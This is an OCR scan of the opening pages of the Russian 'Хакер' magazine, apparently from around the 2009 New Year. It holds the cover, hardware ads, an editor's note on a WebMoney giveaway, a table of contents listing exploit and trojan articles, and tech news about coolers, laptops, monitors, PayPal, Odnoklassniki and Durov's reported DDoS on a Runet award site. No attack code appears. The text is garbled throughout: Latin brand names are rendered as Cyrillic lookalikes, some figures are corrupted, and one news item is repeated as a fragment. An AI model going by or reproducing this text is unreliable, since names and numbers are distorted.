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БАГИ РипСМБ 



(дате)іаті 

Пі-Іип теШа 





ПЕНТЕСТИНГ ПОПУЛЯРНОГО 
ДВИЖКА 

СТР. 50 



ПОДНИМАЕМ 

БАБЛО 

СІРНОИЕ 



ДЕСКТОП 
ѴѴЕВ-КОДЕРА 

СОБИРАЕМ 
РАБОЧЕЕ МЕСТО 
ДЛЯ ѴѴЕВ 2.0 КОДЕРА 

СТР. 20 



ТВЕРДОКАМЕННЫЙ 

АМХ 

ЗАЩИТА 



ПРИЛОЖЕНИЙ, 



КОММЕРЧЕСКИЙ 



ПОСТРОЕННЫХ 
НА АМХ-ФРЕЙМВОРКАХ 



КОДИНГ С ПОМОЩЬЮ 
ОФИЦИАЛЬНОГО 5БК 



СТР. 88 



СТР. 98 





УСПЕХ = 
интеллект + 
технологии! 





ХеоіТ 



іпзісіё 



Четыре ядра. 

Вне конкуренции. 
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Благодаря высочайшей производительности четырехъядерных процессоров Іпіеі® Хеоп® и 
традиционному качеству Р-51уІе, один двухпроцессорный сервер Р-51уІе® МагзГіаІІ® І\ІР 2021 
сегодня выполнит те задачи, для решения которых раньше требовалась производительность 
нескольких высокопроизводительных серверов. 



Жесткие диски: 

3 «горячей» замены 5АТА или 5А5 

Форм-фактор: 

III для установки в стойку 



Краткие технические характеристики: 

Процессоры: 

до двух многоядерных процессоров Іпіеі® Хеоп® 

Оперативная память: до 32 ГБ 



К-$ІуІе в Маг§ІіаІГ № 2021 
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Система качества проектирования, разработки 
и производства компании Р-ЗІуІе Сотриіегз 
сертифицирована по международному стандарту 
150 9001-2000. 



Сделано в России. Сделано на совесть! 

Астрахань ТАН (8512) 39-42-54, 22-85-73, 22-67-35, 22-57-54 Братск БАЙТ (3953) 41-11-21, 41-38-34 Брянск Р-51уІе (4832) 41-17-40, 41-17-28 Владивосток Эр-Стайл ДВ (4232) 45-94-82, 45- 
93-98 Волгоград Авико (8442) 75-83-92 Телесто (8442) 302-604 Воронеж Элмар Трейд (4732) 51-20-18, 53-15-12, 55-65-32 Гагарин Терра Софт (48135) 4-1790 Губкинский ПурИнформ (34536) 
5-5719 Дубна Силиконовая долина (49621) 2-82-92 Екатеринбург Эр-Стайл Урал (3432) 616-086, 613-044, 614-300 Иваново Компьютерные системы (4932) 23-76-26 Калининград Балтик Стайл 
(4112) 99-11-99, 99-11-98 Калуга Грандком (4842) 79-63-55 Олерон (4842) 55-85-85 Кемерово Конкорд Про (3842) 56-14-24, 56-15-75 Киров ИТЦ Компьютер-Сервис (8332) 35-74-24, 35-79-73 
Костомукша Вымпел (814 59) 780-21 Кострома ИТ-Профессионал (4942) 626-903 Краснодар Бизнес Компьютер Центр - Юг (8612) 64-04-50 Красноярск ЛанСервис (3912) 75-12-91, 92, 93 Липецк 
Стек (4742) 776-301 Москва Компьютерплаза (495) 772-7600 Компания Р-Зіуіе (495) 514-1410 Сибкон (495) 292-77-62 БЕЛМОНТ КОНСАЛТАНТС (495) 937-1606 СКАН (495) 739-50-05 АйСиЭс 
Новые Системы (495) 981-08-97 Микро-Тех (495) 786-77-37 (многокан.), 228-51-28 Системотехника 8-916-653-9876 Назрань Медиа-Сервис (928) 732-28-17 Нижний Новгород Эр-Стайл Волга 
(831) 278-40-01, 246-16-23, 246-16-22, 246-35-17 Новосибирск Эр-Стайл Сибирь (383) 214-14-30 Омск (3812) АльфаКом Компьютер 24-33-77, 25-13-46, 25-54-84 Орёл Астрон Электроника (4862) 
76-45-44, 43-36-93 Пенза ЭЛСИ (8412) 54-4141 (многокан.) Пермь Эр-Стайл Кама (3422) 164-376, 106-409 Петрозаводск Илвес (8142) 74-37-37, 70-20-40, 70-69-09 Петропавловск-Камчатский 
АМН (4152) 26-87-51 Ростов-на-Дону Эр-Стайл Дон (863) 293-93-04, 293-93-06, 293-90-94, 293-91-93 Рязань СВ-Сервис (4912) 45-55-44, 45-86-50 Самара Железная логика (846) 335-58-83, 
334-87-29, 279-02-25, 279-02-28 Санкт-Петербург Эр-Стайл СПб (812) 445-34-29 (многокан.) Саратов Мастер Софт Системе (8452) 47-02-67, 47-02-65 Старый Оскол Авантаж-информ (4725) 247- 
349, 246-227 Тамбов Гитон (4752) 71-97-54 Ай Лоджик (4752) 72-39-07 КФ Аксиома (4752) 75-93-70 Тула ПитерСофт - НТ (4872) 35-55-00 Тверь Андреев Софт (4822) 55-11-62, 55-12-71, 55-11-93, 
33-50-98 Тула ПитерСофт-НТ (4872) 35-55-00 РЕА1.С0М (4872) 24-99-99 Тюмень Эр-Стайл Сибирь в Тюмени (3452) 41-41-95 Ульяновск Раздолье (8422) 41-28-82 Уссурийск В-Лазер (4234) 33- 
44-33, 33-71-87, 33-77-98 Уфа Онлайн (347) 223-82-28, 225-96-81, 223-54-46, 223-26-48 Хабаровск Эр-Стайл ДВ регион (4212) 31-45-30, 31-22-28, 31-22-29, 21-85-56 Челябинск Компьютеры 
и образование (351) 265-69-08, 265-69-09 Инженерный центр (351) 729-90-33, 232-52-62, 232-53-44 Чита ТНТ-Плюс (3022) 32-13-03 Южно-Сахалинск Гео-Строй Групп (4242) 42-99-74 Якутск 
Эльф-95 (4112) 45-73-33 Сибирская компания системной интеграции (4112) 34-30-28, 34-11-64, 34-14-64 Ярославль НПК Кари (4852) 47-99-09 Комдив (4852) 427-888 



Оптовые поставки: 

ООО «Эр-Эс-Ай»: тел.: (495) 514-1419 

ѵѵѵѵѵѵ.гзі.ги 

Техническая поддержка: 

ЗАО «Эр-Стайл Компьютере»: 
тел.: (495) 514-1417 
8-800-200-800-7 * 

ѵѵѵѵѵѵ. г-зіу Іе-со т риіе гз. г и 



К- Зіуіе 

СОМРІІТЕКЗ 



* бесплатный телефон для регионов России 







ІПІГО 



Естьу нас вХакере добраятрадиция - дарить под новый 
год подарки. Но, естественно, не всякий уныл ый отстой 
типа елочных игрушекили мишуры, а настоящиеХ-по- 
дарки, которыеужточно пригодятся кул-хекеру вроде 
тебя. 

В этом году мы решили задарить тебе ни много ни мало 
556-сертификат от ѴѴМХ-кошеля с кучей бабла на счету. 
Посчитали, сколько осталось в редакционной копилке, 

- и насчитали там $638. Но Горл уговорил меня выгодно 
вложить деньги вакцин Газпрома, итеперьу нас осталась 
только сотня грина, извини. Но под новый год и это непло- 
хо, правда ведь? 



Итак, пароль от сертификата: Хакер 2009. Ну, вроде все, 
с праздником тебя, хорошего пинга в новом году. Ой-ой, 
совсем забыл. Где же взять сам сертификат? Приятель, 
а вот с этим небольшая загвоздка. Бабло достанется са- 
мому верному читателю, который сможет найти разгадку 
в октябрьском номере на страницах 44-45. 

Желаюудачи, пока :). 



Іпікііогг, гл. ред.ХІ 



исіаібе.ііѵеіоигпаі.сот 
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ВСЕ НОВОЕ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



Р ЮНІМ 

016 БОЛЬШОЕ В МАЛОМ 

СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ СУБНОУТБУКОВ 



088 ПОДНИМАЕМ БАБЛО С ІРНОЫЕ 

ВВЕДЕНИЕ В КОММЕРЧЕСКИЙ КОДИНГ С ПОМОЩЬЮ ОФИЦИАЛЬНОГО 50К 

094 ТЕМНОЕ ИСКУССТВО ИГРОДЕЛА, ЧАСТЬ 3 

ОДНОПОЛЬЗОВАТЕЛЬСКАЯ ИГРА: ДОСТИЖЕНИЕ АБСОЛЮТА 

098 ТВЕРДОКАМЕННЫЙ АЗАХ 

ЗАЩИЩАЕМ ВЕБ-ПРИЛОЖЕНИЯ, ПОСТРОЕННЫЕ НА ПОПУЛЯРНЫХ АЧАХ-ФРЕЙМВОРКАХ 

104 ТРЮКИ ОТ КРЫСА 

ПРОГРАММИСТСКИЕ ТРЮКИ И ФИЧИ НА С\С++ ОТ КРИСА КАСПЕРСКИ 



020 


ДЕСКТОП ѴѴЕВ-КОДЕРА 

СОБИРАЕМ РАБОЧЕЕ МЕСТО ДЛЯ АЧАХ И ѴѴЕВ 2.0 КОДЕРА 




М 1 і II I \ш 


026 


ЗА ГРАНЬЮ НЕВИДИМОСТИ 


106 


КОІ.ЕХ НА КОЛЕНКЕ 


030 


НОВЫЕ МЕТОДЫ СОХРАНИТЬ ИНГОНИТО В ИНЕТЕ 

ОДИН В ПОЛЕ НЕ ВОИН 


112 


КАК СДЕЛАТЬ ТОЧНЫЕ ДВОИЧНЫЕ ЧАСЫ НА ПРОГРАММИРУЕМОЙ ЛОГИКЕ 

БЕСПРОВОЛОЧНЫЙ ТЕЛЕГРАФ 




СРЕДСТВА ДЛЯ СОВМЕСТНОЙ РАБОТЫ ОНЛАЙН 




ГОНИМ ДАННЫЕ ПО ВОЗДУХУ 



ХАКЕР.РКО 



036 


ЕА5У НАСК 


116 


СЕТЕВОЙ КОП 




ХАКЕРСКИЕ СЕКРЕТЫ ПРОСТЫХ ВЕЩЕЙ 




ИЗУЧАЕМ ВОЗМОЖНОСТИ НОВОЙ ТЕХНОЛОГИИ ЗАЩИТЫ СЕТЕВОГО ДОСТУПА ЫАР 


040 


ОБЗОР ЭКСПЛОЙТОВ 


120 


ВОЛШЕБНАЯ ЛАМПА АДМИНА 




КУЧКА НОВЕНЬКИХ ДЫРОК ОТ КРИСА 




ПОШАГОВОЕ РУКОВОДСТВО ПО УСТАНОВКЕ ЬАМР-СЕРВЕРА 


046 


ЧТО НАМ СТОИТ ТРОЙ НАСТРОИТЬ? 


126 


ЭЛАСТИЧНАЯ ѴОІР- ПЛАТФОРМА 




ПЛЮСЫ И МИНУСЫ ПОПУЛЯРНЫХ ТРОЯНОВ 




ЕЬАБТІХ: ГИБРИДНОЕ РЕШЕНИЕ ДЛЯ БЫСТРОГО И ПРОСТОГО 


050 


В1ЖСМ5. УЧЕБНИК ДЛЯ РЕСЕРЧЕРА 




РАЗВЕРТЫВАНИЯ ѴОІР-ТЕЛЕФОНИИ 




НЕЗАВИСИМЫЙ АУДИТ КРУПНОГО ДВИЖКА 






056 


ЭНЦИКЛОПЕДИЯ АНТИОТЛАДОЧНЫХ ПРИЕМОВ 








СКРЫТАЯ УСТАНОВКА 5ЕН-0БРАБ0ТЧИК0В 






060 


РАЗЛОМ М5Ы 


132 


Р5УСН0: НА РЕКЛАМНОЙ ИГЛЕ 




ЭКСПЛУАТИРУЕМ КРУПНЕЙШИЙ ПРОЕКТ МІСР050ЕТ 




РЕПРЕССИРОВАННЫЕ ЖЕРТВЫ РЕКЛАМЫ, ИЛИ КАК НАС РАЗВОДЯТ НА БАБКИ 


064 


ІСО: НЕОЧЕВИДНАЯ УГРОЗА 


136 


РАО ІЖІТЕО 




КРАСИВЫЙ ЗАХВАТ ТЫСЯЧИ УИНОВ 




БОЛЬШОЙ РАО 


068 


Х-ТООЬБ 


139 


ДИСКО 




ПРОГРАММЫ ДЛЯ ВЗЛОМА 




8,5 ГБ ВСЯКОЙ ВСЯЧИНЫ 






140 


ПОДПИСКА 








ПОДПИШИСЬ НА НАШ ЖУРНАЛ 






142 


Х-РІІ22І.Е 


070 


Х-5ТІІРР 




ХАКЕРСКИЕ ГОЛОВОЛОМКИ 




ФОТОГРАФИИ РАБОЧИХ МЕСТ ХАКЕРОВ 


144 


ПОДАРКИ 2К+9 


072 


КОПАЙТЕ, КЕВИН, КОПАЙТЕ! 




КРУТЫЕ Х-ДЕВАЙСЫ, КОТОРЫЕ НЕ СТЫДНО ПОДАРИТЬ НА НОВЫЙ ГОД 




РЕСУРС 0106. СОМ И ЕГО СОЗДАТЕЛЬ 
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076 ВОСХОД СВОБОДНОГО СОЛНЦА 

ОБЗОР ОС ОРЕЫБОЬАРІБ 2008.1 1 

080 ПОСЕЛИ ПИНГВИНА НА ЛАПТОПЕ 

ОПЫТ ИСПОЛЬЗОВАНИЯ ОС ЫІЧІЧХ НА ЕІІЛТ51І- 
5ІЕМЕМ5 Е5РРІМ0 МОВІЬЕ 09200 

084 УМНЫЕ ИГРЫ С СЕТЯМИ 

ОБЗОР НЕОБЫЧНЫХ СЕТЕВЫХ УТИЛИТ 
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Охлаждаем красиво 

Хорошо известная всем, кто предпочитает качественное и красивое 
железо, компания ТЬегтаКаке часто радует нас новинками. Сегодняш- 
ний случай — не исключение. Новый процессорный кулер ТЬегтаІІаке 
ЗріпО для чипсетов Зоскеі ЦЗА775 (Іпііеі) и Зоскеі 754/939/АМ2/АМ2+ 
(АМО хочется назвать произведением искусства. Девайс длиной 85 мм и 
диаметром 80 мм за счет встроенной подсветки в работающем состоянии 
напоминаеттурбину какого-то футуристического корабля. Красота ди- 
зайна и подсветка это хорошо, нотехнические характеристики ещелуч- 
ше. Кулер состоит из 50 пластин алюминиевого радиатора, нанизанных 



Обо всем за последний месяц 




на шесть отполированных до зеркального блеска теплоотводныхтрубок, 
в свою очередь исполненных из алюминия и меди. Количество оборотов 
в минуту регулируется от 1000 до 1600 (выносной регулятор в комплекте], 
а уровень шума при этом составляет от 19 до 28 дБ. Также, благодаря 
технологии 5 р і га I Ріп ТесЬпоІоду, на поверхности устройства формирует- 
ся спираль, которая, позаверениям создателей, существенно улучшает 
его производительность. Ксожалению, цена и дата поступления кулера в 
продажу пока неизвестны, но будем ждать и надеяться. 



Віи-гау не устоял 

Окончательно взломать систему защиты Віи-гау дисков 
от копирования удалось группе хакеров с форумов Ооопп9 
Когит.с1оопп9.огд ). Поуказанной ссылке можно почитать 
подробности того, как идея превратилась в работающую 
технологию. Прогнозы некоторыханалитиков, предре- 
кавших, что в ближайшие8-10лет«раскусить»защиту не 
удастся, рухнули уже давно. По сути, ВБ+ была взломана 
еще пол года назад, когда в программе ЗІуЗоІІ: АпуОѴО 
появилась возможность просматривать зашифрован- 
ные диски. Но прога была платной, а решение от ребят с 
Ооот9 относится к ореп зоигсе и вполне подходит для ѴІ_С 
или тріауег. Ключом к взлому послужил тот факт, что де- 
шифровать Віи-гау диски могут нетолько аппаратные пле- 
еры, но и программные. Хорошая новость заключается в 
том, что теперь должен появиться даже Віи-гау плеер под 
Ыпих, создание которого в обход ВО+ было невозможно. 
Традиционно, есть и плохая — производители наверняка 
будут совершенствовать и менять схему ВБ+ как для про- 
граммных, так и для аппаратных плееров. А значит, нам 
придется искать новые версии софта или качать и ставить 
новые прошивки на аппаратные плеера. Хотя взломщиков 
это в любом случае не остановит. Скорее всего, эти версии 
падутточно также, каки старые. 
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ный Комфорт 



ВОР#### 

ВеіегзсІогІ 



НІѴЕА 



НЕ СОГЛАШАЙСЯ 
НА РАЗДРАЖЕНИЕ 



Инновационная Система Анти-Раздражения 



ЕХТКЕМЕ СОМРОКТ 



бритье без раздражения 

уникальная формула паіигаі МІСКО ТЕС 

активные успокаивающие ингредиенты 

гель борется с раздражением уже во время бритья 

бальзам мгновенно впитывается и успокаивает кожу 

доказано: в результате использования 89% мужчин 

не испытывают раздражения после бритья ** 



ДЛЯ БРИТЬЯ 



ТО, ЧТО ХОТЯТ МУЖЧИНЫ 



Активно борется с 
Ѵже в процессе бритья 



Активно борется с раз, 
Мгновенный комфорт 



гтпедапеѵг 



» 



Количество вредоносного ПО, удаляемого с машин российских юзер 
МісгозоЩ возросло на 86%і 



Затмение от М8І 



Тайваньская компания М5І, один из признанных лидеров в области создания сис- 
темных плат и другого, самого разнообразного, железа, представила новую мате- 
ринскую плату М5І Есіірзе. Интересной особенностью новинки является рекомен- 
дованная Іпіеі. технология 0гМ05 второго поколения, с возможностью управлять 
питанием чипсета. Напомним, что ОгМОЗубиваетсразу двух зайцев — обеспечи- 
вает прекрасную производительность, одновременно снижая энергопотребление. 
М5І Есіірзе — первая плата с 0гМ05 второго поколения на борту. За счетэтого 
удалось избавиться от громоздкой конструкции теплоотвода, заменив его на два 
изящных, но более чем действенных, теплопроводника. Производители уверяют, 
что плата с легкостью способна удерживать рабочуютемпературу в пределах45°С 
и даже в суровыхусловиях оверклокинга — в пределах 80°С. Ну, а чтобы счастье 
ценителей хорошего железа было более полным, в комплекте к М5І Есіірзе идет 
аппаратный аудио-процессор отСгеаІіѵе — Х-Еі, относящийся кЫдб-епсІ классу, 
плюс платы снабжаются звуковыми картами Х-ЕіХігете Аибіо. Помимо вышепере- 
численного, для Есіірзе разработали новый инструментарий ВІ05. Куже известным 
нам по плате МБІ Р45 фишкам добавились две функции СРІІ Зресібсаііоп и М-ЕІазЬ. 
Последний совершенноуникален, — это первый в своем роде инструмент, позволя- 
ющий загрузить через 115В вторую ВІ05 и протестировать ее перед установкой. 




Россия занимает А-е место в мире по 
числа юзеров страны. 



количеству пользователей ІРѵб — 0 . 76 % от общего 




Двуликий ноутбук 

Чего только ни придумывают производители ноутбуков, что- 
бы заинтересовать покупателя и перещеголять конкурентов. 
Вот и компания Ещіізи не стоит на месте. Несмотря на то, 
что идея ноутбуков с дополнительным дисплеем не нова и 
большой популярности не заработала, это не мешает Ещіізи 
пробовать и дерзать. Ноутбук и^еВоок N7010 с 16-дюймо- 
вым экраном и вспомогательным сенсорным дисплеем, 
диагональю 4" позиционируется производителем какзаме- 
на настольному ПК. Такомузаявлению вполне соответствует 
начинка: процессор Іпіеі Соге 2 Оио Р8400 (2.26 ГГц], 4 Гб 
оперативной памяти, дискретное видео АТІ Рабеоп НО 3470 
(256 Мб), жесткий дискна 320 Гб, привод Віи-гау, 3-мега- 
пиксельная камера, НОМІ-выход, съемный пылевой фильтр 
и даже клавиатура, защищенная от попадания жидкости. 

Но все же главной фишкой остается сенсорный ТоисЬ 2опе 
— такназвали в Ещіізи 4-дюймовый экран. На нем можно не 
только просматривать фото и управлять приложениями. На 
Тоисб Хопе можно вывести и само приложение, вместо того 
чтобы его минимизировать. По сути, это хоть и маленький, 
но полноценный второй монитор. Любителям в одном окне 
смотреть фильм, а во втором заниматься чем-то еще, это 
решение должно придтись по душе. Рекомендованная цена 
ноутбука составляет $1 500. 



Известный торрент-трекер ШерігаіеЬау.ог§ отправил заявку в книгу рекордов Гиннеса, 
достигнув отметки 25 МЛН. пользователей. 
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АЗІІЗ рекомендует ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит 




кѣУіѣГѲѵг 

Калейдоскоп красок 
Калейдоскоп возможностей 

Один взгляд на А81І8 Р8Ѵг - и Вы не сможете пройти мимо. Плавные линии узоров и потрясающие оттенки сверкающей 
полированной крышки поразят Ваше воображение. Неповторимый стиль превосходно гармонирует с самыми 
инновационными функциями. Созданный на базе процессорной технологии ІпІеГ Сепігіпо® 2, оснащенный подлинной ОС 
ѴѴіпсІоѵѵз Ѵізіа® Ноте Вазіс и технологией Ехргезз Саіе, дающей возможность доступа к сети Іпіегпеі за 8 секунд*, ноутбук 
Р8Ѵг предлагает пользователям великолепную производительность. 

Всемирная гарантия 2 года ѵѵѵѵѵѵ.азиз.ги Горячая линия АЗІІЗ: (495) 23-11-999 

А5и54ѴОІІ (495) 585-8045; Белый Ветер - ЦИФРОВОЙ (495) 730-30-30; СтартМастер (495) 785-85-55, 8 (800) 555-8-555; Неоторг (495) 223-23-23; РОБАРІ5 (495) 755-55-57 

Москва: Аваком-М (495) 730-74-54, ЮІЧ (495) 5-444-333, Респект (495) 177-40-77, Санрайз (495) 788-80-88, ТРК (495) 739-08-28, ТепГоІсІ Ѳгоир (495) 580-6385, ІІЗИ (495) 775-82-02, Ф-Центр 

(495) 925-6447, МЕХ113 (495) 628-23-67, ОШІ (495) 221-1111, ПИРИТ (495) 785-55-54, Мерлион (495) 981-84-84, ЕІко (495) 234-28-45, Пронет (495) 789-3846, Юпитер (499) 271-8350, ОС5 

(495)995-25-75,(812)324-28-70; 

Санкт-Петербург: АІрГіа (812) 320-80-70, ІЧВСот (812) 329-70-00, Кей (812) 074, Компьютерный мир (812) 333-00-33, СТР Компьютере (812) 542-45-51; Владивосток: ДНС (4232) 300-454; 
Воронеж: РЕТ (4732) 77-93-39; Екатеринбург: Буква (343) 2222-025; Иркутск: ѴѴІгагсІ (3952) 258-001; Казань: НоутбукофФ (843) 264-26-01; Краснодар: Владос (861) 210-10-01, Санрайз 
(861 ) 21 0-00-66; Красноярск: Аверс (3912) 560-561 , Борлас СБ (391 2) 58-09-52, Старком (3912) 49-1 1-11; Новосибирск: НЭТА (383) 21 6-33-1 1 , Техносити (383) 21 2-53-33, Левел (383) 21 2-00-05, 
Готти (383) 362-00-44; Омск: Ритм (3812) 23-64-00; Пермь: Инстар Ноутбукофф (342) 270-01-11; Ростов-на-Дону: Санрайз (863) 240-11-77, Иманго (863) 232-47-18; Самара: Прагма 
(846) 270-17-01, Санрайз (846) 241-67-53, Саттелит (846) 224-00-00; Саратов: Атто (8452) 444-111; Томск: Интант (3822) 56-00-56; Тюмень: Арсенал+ (3452) 797-070; Уфа: Кламас 
(347) 291-21-12, Форте ВД (347) 260-00-00 




Мощность 
в твоих руках 



Іпіеі, логотип ІпТеІ, Сепігіпо и Сепігіпо Іпзісіе 
являются товарными знаками 
корпорации ІпТеІ в США и других странах. 



Товар сертифицирован, на правах рекламы 




^ тедапеѵа 



Самый мощный суперкомпьютер на планете — система Коайшппег компании ІВМ, 
производительностью 1.106 петафлоп. 

РауРаІ русифицировался 

Свершилось невероятное — великая и ужасная платежная система РауРаІ«за говорила» по-русски. РауРаІ, 
прозванная в народе «Палкой», хорошо известна как не самая дружественная к России и странам СНГ система 
оплаты. До недавнего времените россияне, кто все же пользовался ееуслугами (например, совершая покупки 
через еВау), находились в крайне незавидном положении «жителей страны третьего мира». На сайте РауРаІ 
не было русского интерфейса, возможность принимать платежи для нашей страны отключена до сих пор, да и с 
оплатой покупокто и дело возникаютпроблемы. Носитуация, похоже, начинаетменяться клѵчшемѵ— раѵраі. 
сот внезапно явил нашим пользователям грамотный русский интерфейс. Стоит отметить, что, считая великий 
и могучий, сайт переведен всего лишь на 5 языков. По Сети сразу поползли слухи, что к концу 2009-го года 
русскоязычную площадку планирует освоить и еВау, а значит недалеко до возможности принимать на РауРаІ 
деньги, выступая в качестве полноценного продавца. Насколько оправданы эти ожидания — неизвестно, а вот 
ожидать поддержку на родном языке, скорее всего, действительно стоит. Без сомнения, это должно облегчить 
жизнь многим любителям сетевого шоппинга. 

Универсальный оператор 

Завершив в сентябре сделку по покупке «Голден Телекома», Билайн превратился в универсального те- 
лекоммуникационного монстра, предоставляющего абонентам широчайший спектр услуг: начиная от 
традиционной мобильной связи, работы в скоростных сетях 30 и заканчивая 1 00 мегабитным кабель- 
ным интернетом на базе оптоволоконной сети РТТВ. 

Сегодня «Билайн» продает проводной и нет в 17 городах России, предоставляя услуги кабельной связи 
более чем 600 тысячам человек, имеет около 1 5 500 ѴѴі-Рі точек доступа, обслуживая до 1 00 тысяч 
беспроводных абонентов. Также до конца года Билайн планирует завершить развертывание сетей 
третьего поколения в 40 городах России. 




Билайн" 





«Одноклассники» 

Не та к давно одна из крупнейших российских социальный сетей «Од- 
ноклассники» начала монетизироваться (мы писали об этом — в качест- 
ве пробного шара была запущена платная услуга «режим невидимки»]. 
Затем последовали и другие «дополнительные услуги»... а теперь 
создатели ресурса, очевидно, посчитали, что от пробных попыток пора 
переходить к более серьезным действиям. Ход конем сделан — ре- 
гистрация новых пользователей на «Одноклассниках» стала платной. 
Оплата производится опять же посредством 5М5. Стоимость активации 
аккаунта составляет около $1 США (сумма варьируется в зависимости 
отоператора). Тем, кто не хочет платить, предоставляется урезанная 
версия сайта: без возможности выставлять оценки фотографиям и пи- 
сать комментарии. Но особенно интересно, что подается все под видом 
борьбы со спамом. Официальная формулировка: «Это вынужденная 
мера, необходимая для поддержания порядка на сайте и защиты 
всех пользователей от автоматической рассылки спама. Спасибо за 
понимание!». Сомнений нет, платная регистрация сыграетсвою роль 
и в борьбе со спам -рассылка ми. Но, сдается нам, первичная задача 
новшества далека от столь благородных целей. 



С>ѴѴХСА-мониторы 

грядут 

Сразу двумя новинками порадовали нас производители монито- 
ров, — да какими ! Широкоформатные дисплеи уже и так потихонь- 
ку становятся нормой, но компания Затзипд решила «развить 
мысль», представив публике первый в мире СІѴѴХОА- монитор. 
23-дюймовая модель 2342 В ѴѴХ с соотношением сторон 16:9 
обладает разрешением 2048 х 1 1 52. Благодаря этому на экране 
спокойно умещаются сразу два документа формата А4 — и еще 
остается место для Ѵізіа ЗісІеЬаг. Однако технические характе- 
ристики выглядят не столь внушительно: контрастность монитора 
— 20000:1, время отклика составляет 5 мс, а размер пикселя 0.249 
миллиметра. Интересно, что на родном корейском рынке 2342ВѴѴХ 
будет стоить всего $295, но время начала поставок в другие страны 

и цены для них пока не объяв- 
лены. Не отстает от Затзипд и 
компания Беи. Вскоре после 
презентации 2342ВѴѴХ БеИтоже 
объявил о выпуске ОѴѴХОА-мо- 
нитора — 5Р2309. Разрешение 
у БеИ аналогичное: 2048 х 1 1 52, 
а вот остальное выглядит более 
многообещающе: заявленная 
динамическая контрастность 
80000:1 , цветовой охват про- 
странства КІТ5С 98% и время 
отклика при этом всего 2 мс. 
Цена на 5Р2309 пока неизвест- 
на, даже «родная». 
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Яндекс. Карты в 
твоем мобильном 

Скачай мобильное приложение на \ѵар.тІ5.ги: 

■ получай информацию о пробках 

■ выбирай свободные дороги 

■ определяй местонахождение друзей на карте 




мтс оператор связи • мтс 



При пользовании услугой оплачивается ОРРЗ-трафик согласно вашему ТП. 

Оплата определения местоположения производится согласно тарифам по услуге «Локатор: 
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Порядка 20 % потребителей США отказались от сетевых покупок из-за страха перед кр 
личных данных. 



«Вконтакте» как оружие 




Пока «Одноклассники» вводят платную регистрацию, руководитель 
проекта «Вконтакте» Павел Дуров балуется ООоЗ-атаками, используя 
свою социальную сеть как орудие возмездия. Объектом атаки стал 
сайт«Премии рунета», неприятности с которой началисьу «Вконтак- 
те» еще в прошлом году. Тогда, по словам Дурова, проголосовать за его 
детище смогла от силы лишь десятая часть пользователей ресурса. 
Сайт премии просто не выдерживал нагрузок, ввиду огромного коли- 
чества желающих отдать голос любимой соц. сети. В итоге, «Вконтак- 



те» занял второе место, уступив первое Ьазб.огд.ги . В текущем году 
«Вконтакте» на «Премию рунета» официально не номинировался, но 
его выдвинули пользователи, что предусмотрено правилами. Узнав об 
этом, Павел Дуров не растерялся и попросил организаторов удалить 
свой сайт из списка участников. Те, в свою очередь, направили Павлу 
е-таііс просьбой подтвердить свое намерение быть исключенным 
из голосования и заверениями, что в этом году ситуация сзависа- 
нием сайта не повторится, — на что Дуров отреагировал не совсем 
адекватно. Заявив, что организаторы его игнорируют, он добавил в 
код «Вконтакте» маленький кусочек, из-за которого каждый заходя- 
щий на сайт пользователь, сам того не подозревая, обращался ксайту 
ргетіагипеіа.ги . «Премия рунета» не выдержала и «легла» почти 
на день. Сам Дуров объяснил свои действия проведением «тест- 
драйва». Он сказал, что просто хотел проверить, действительно ли 
прошлогоднюю нестабильность сайта устранили, какего заверили ор- 
ганизаторы. Оказалось, что нет, и Павлутеперь вполне может грозить 
судебное разбирательство. После инцидента «Вконтакте», конечно, 
был исключен из списка участников. 



Виртуальный железный занавес 



Правительства разных стран стремятся ограничивать сетевую свободу 
своих граждан, — этот факт уже не нов. Достаточно вспомнить Китай с 
его «Золотым щитом» или недавнюю блокировку ЖЖ властями Казах- 
стана. Наше правительство, какэто ни удивительно, пока строитель- 
ством шлюзов, подобных китайскому, не озадачивалось, зато наши 
разработчики ПО, что еще более удивительно, высказываются «за». 
Идея Евгения Касперского о введении интернет-паспортов в свете 
последних событий начинает казаться совсем безобидной. Дело втом, 
что теперь президент отечественной ассоциации разработчиков ПО 
Валентин Макаров выступил с предложением создать в России шлюз, 
который отделит нас от всего остального интернета. По его мнению, 
совсем не обязательно использовать подобную конструкцию для ущем- 
ления свободы в Сети, ведь это еще и удобный инструмент для борьбы 
с недобросовестным ее использованием. При этом он предлагает 
опираться на опыт уже упомянутого Китая, Сингапура иЯпонии.и даже 
подсчитал, что на создание шлюза уйдет порядка 1 0 лет и несколько 
сот миллионов долларов, которые с радостью должны предоставить 
инвесторы. Утешает одно — с людьми, принимающими решения по 
таким вопросам, свой проект Павел пока не обсуждал. Хотелось бы 
думать, что идея Макарова не придется им по душе, даже если им ее 

«Резиновый» Віи-гау 

Как известно — места много не 
бывает, и неважно, о чем идет 
речь: о емкости жесткого диска, 
или же о любом другом носи- 
теле информации. Последнее 
время ученые всего мира активно 
стараются увеличить объем 
оптических дисков. Венцом прогресса пока считается формат Віи-гау, 
вмещающий до 54 Гб. Над увеличением этой цифры бьются лучшие 
умы планеты. Так, Ю К уже анонсировала появление 1 00- гигабайтных 
Віи-гау дисков, а компания Ріопееглетом 2008 года продемонстри- 
ровала прототип на 400 Гб. Однако все это может показаться детским 




представят, потому как слишком хорошо известно, куда ведут дороги, 
вымощенные благими намерениями. 



лепетом в сравнении с разработкой университета Беркли. Тамошние 
гении измыслили технологию, способную увеличить емкость Віи- 
гау, ни много, ни мало, до одного терабайта. Разработка получила 
название «летающая плазмоническая головка». На деле это не что 
иное, как группа металлических линз, направляющих лазерный луч 
сквозь возбужденные электроны. Такой луч способен наносить на диск 
дорожки на но- размеров, и сами создатели сравнивают скорость и 
точность работы головки с «Боингом 747», летящим в 2 мм над землей. 
По сути, вся эта конструкция напоминает старый проигрыватель для 
виниловых пластинок, которым ученые и вдохновлялись. Коммерчес- 
кое производство и применение «ретро- нов инки» планируют начать 
уже в течение ближайшей пятилетки. 
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Охлаждаем красиво 

Хорошо известная всем, кто предпочитает качественное и красивое 
железо, компания ТЬегтаКаке часто радует нас новинками. Сегодняш- 
ний случай — не исключение. Новый процессорный кулер ТЬегтаІІаке 
ЗріпО для чипсетов Зоскеі ЦЗА775 (Іпііеі) и Зоскеі 754/939/АМ2/АМ2+ 
(АМО хочется назвать произведением искусства. Девайс длиной 85 мм и 
диаметром 80 мм за счет встроенной подсветки в работающем состоянии 
напоминаеттурбину какого-то футуристического корабля. Красота ди- 
зайна и подсветка это хорошо, нотехнические характеристики ещелуч- 
